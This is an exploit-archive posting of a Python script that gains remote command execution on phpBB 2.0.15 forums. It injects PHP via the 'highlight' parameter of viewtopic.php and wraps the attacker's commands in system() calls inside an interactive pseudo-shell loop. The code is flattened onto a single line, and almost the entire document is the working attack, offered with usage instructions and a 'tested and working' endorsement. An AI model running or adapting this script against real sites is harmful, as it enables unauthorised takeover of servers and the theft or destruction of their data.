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phpBB 2.0.15 (highlight) Remote PHP Code Execution
================================================== phpBB 2.0.15 (highlight) Remote PHP Code Execution ================================================== # tested and working /str0ke #!/usr/bin/pyth0n # ############################################################### this exploit for # phpBB 2.0.15 print "\nphpBB 2.0.15 arbitrary command execution eXploit" # emulates a shell, print " 2005 by rattle@awarenetwork.org" # rather than print " well, just because there is none." # sending a single # command. import sys #### from urllib2 import Request, urlopen from urlparse import urlparse, urlunparse from urllib import quote as quote_plus INITTAG = '<g0>' ENDTAG = '</g0>' def makecmd(cmd): return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0])) _ex = "%sviewtopic.php?t=%s&highlight=%%27." _ex += "printf(" + makecmd(INITTAG) + ").system(%s)." _ex += "printf(" + makecmd(ENDTAG) + ").%%27" def usage(): print """Usage: %s <forum> <topic> forum - fully qualified url to the forum example: http://www.host.com/phpBB/ topic - ID of an existing topic. Well you will have to check yourself. """[:-1] % sys.argv[0]; sys.exit(1) if __name__ == '__main__': if len(sys.argv) < 3 or not sys.argv[2].isdigit(): usage() else: print url = sys.argv[1] if url.count("://") == 0: url = "http://" + url url = list(urlparse(url)) host = url[1] if not host: usage() if not url[0]: url[0] = 'http' if not url[2]: url[2] = '/' url[3] = url[4] = url[5] = '' url = urlunparse(url) if url[-1] != '/': url += '/' topic = quote_plus((sys.argv[2])) while 1: try: cmd = raw_input("[%s]$ " % host).strip() if cmd[-1]==';': cmd=cmd[:-1] if (cmd == "exit"): break else: cmd = makecmd(cmd) out = _ex % (url,topic,cmd) try: ret = urlopen(Request(out)).read() except KeyboardInterrupt: continue except: pass else: ret = ret.split(INITTAG,1) if len(ret)>1: ret = ret[1].split(ENDTAG,1) if len(ret)>1: ret = ret[0].strip(); if ret: print ret continue; print "EXPLOIT FAILED" except: continue # 0day.today [2024-12-23] #